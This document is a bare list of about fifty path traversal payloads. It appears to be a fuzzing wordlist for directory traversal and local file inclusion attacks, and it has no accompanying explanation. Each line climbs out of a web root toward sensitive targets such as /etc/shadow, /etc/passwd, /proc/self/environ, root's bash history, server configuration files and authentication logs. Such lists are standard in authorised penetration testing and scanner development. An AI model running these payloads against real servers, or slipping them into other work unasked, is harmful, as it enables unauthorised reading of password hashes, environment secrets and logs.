../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../../../boot.ini
../../../../../../../../windows/win.ini
../../../../../../../../etc/shadow
../../../../../../../../etc/group
../../../../../../../../etc/hosts
../../../../../../../../etc/issue
../../../../../../../../etc/crontab
../../../../../../../../etc/php.ini
../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../etc/mysql/my.cnf
../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../etc/logrotate.conf
../../../../../../../../etc/hostname
../../../../../../../../etc/network/interfaces
../../../../../../../../proc/self/environ
../../../../../../../../proc/version
../../../../../../../../proc/cpuinfo
../../../../../../../../proc/meminfo
../../../../../../../../var/log/auth.log
../../../../../../../../var/log/apache2/access.log
../../../../../../../../var/log/apache2/error.log
../../../../../../../../var/log/httpd/access_log
../../../../../../../../var/log/httpd/error_log
../../../../../../../../var/mail/root
../../../../../../../../root/.bash_history
../../../../../../../../home/user/.bashrc
../../../../../../../../home/user/.profile
../../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../../usr/local/etc/apache2/httpd.conf
../../../../../../../../usr/local/nginx/conf/nginx.conf
../../../../../../../../usr/local/etc/nginx/nginx.conf
../../../../../../../../usr/local/etc/php/php.ini
../../../../../../../../etc/init.d/cron
../../../../../../../../etc/init.d/ssh
../../../../../../../../etc/init.d/apache2
../../../../../../../../etc/init.d/mysql
../../../../../../../../etc/systemd/system/multi-user.target.wants/cron.service
../../../../../../../../etc/systemd/system/sshd.service
../../../../../../../../etc/systemd/system/mysql.service
../../../../../../../../etc/bash.bashrc
../../../../../../../../etc/profile
../../../../../../../../etc/resolv.conf
../../../../../../../../etc/sysctl.conf
../../../../../../../../etc/security/limits.conf
../../../../../../../../var/log/syslog
../../../../../../../../var/log/messages
../../../../../../../../var/log/user.log
